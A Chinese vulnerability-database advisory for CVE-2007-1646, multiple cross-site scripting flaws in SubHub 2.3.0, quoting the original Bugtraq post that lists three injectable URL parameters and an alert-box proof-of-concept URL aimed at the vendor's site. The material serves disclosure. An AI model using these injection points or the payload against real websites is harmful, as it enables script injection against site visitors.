SubHub 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191214 漏洞类型 跨站脚本
发布时间 2007-03-23 更新时间 2007-03-23
CVE编号 CVE-2007-1646 CNNVD-ID CNNVD-200703-593
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81852
https://cxsecurity.com/issue/WLB-2007030173
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-593
|漏洞详情
SubHub2.3.0版本中存在多个跨站脚本攻击漏洞。远程攻击者可以提交搜索文本参数到(a)/search或信息参数到(b)/calendar或(c)/subscribe,注入任意的web脚本或HTML。
|漏洞EXP
**SubHub v2.3.0**

Site: http://www.subhub.com/
       & others that use this software

Type of Expliot: XSS

Version : 2.3.0

Discover: }T{-_-}T{

Bug in : /search?searchtext=<insert xss here> 
/calendar/?message=<insert xss here>
/subscribe?message=<insert xss here>

- - - - - - - - - - - - - - - -

Exploit POC
http://www.subhub.com/search?searchtext= <IMG SRC=javascript:alert('XSS')>

- - - - - - - - - - - - - - - -

Greetz to : -ZV-
|受影响的产品
Subhub Subhub 2.3.0
|参考资料

来源:BUGTRAQ
名称:20070321**SubHubv2.3.0**
链接:http://www.securityfocus.com/archive/1/archive/1/463488/100/0/threaded
来源:XF
名称:subhub-search-xss(33161)
链接:http://xforce.iss.net/xforce/xfdb/33161
来源:SREASON
名称:2475
链接:http://securityreason.com/securityalert/2475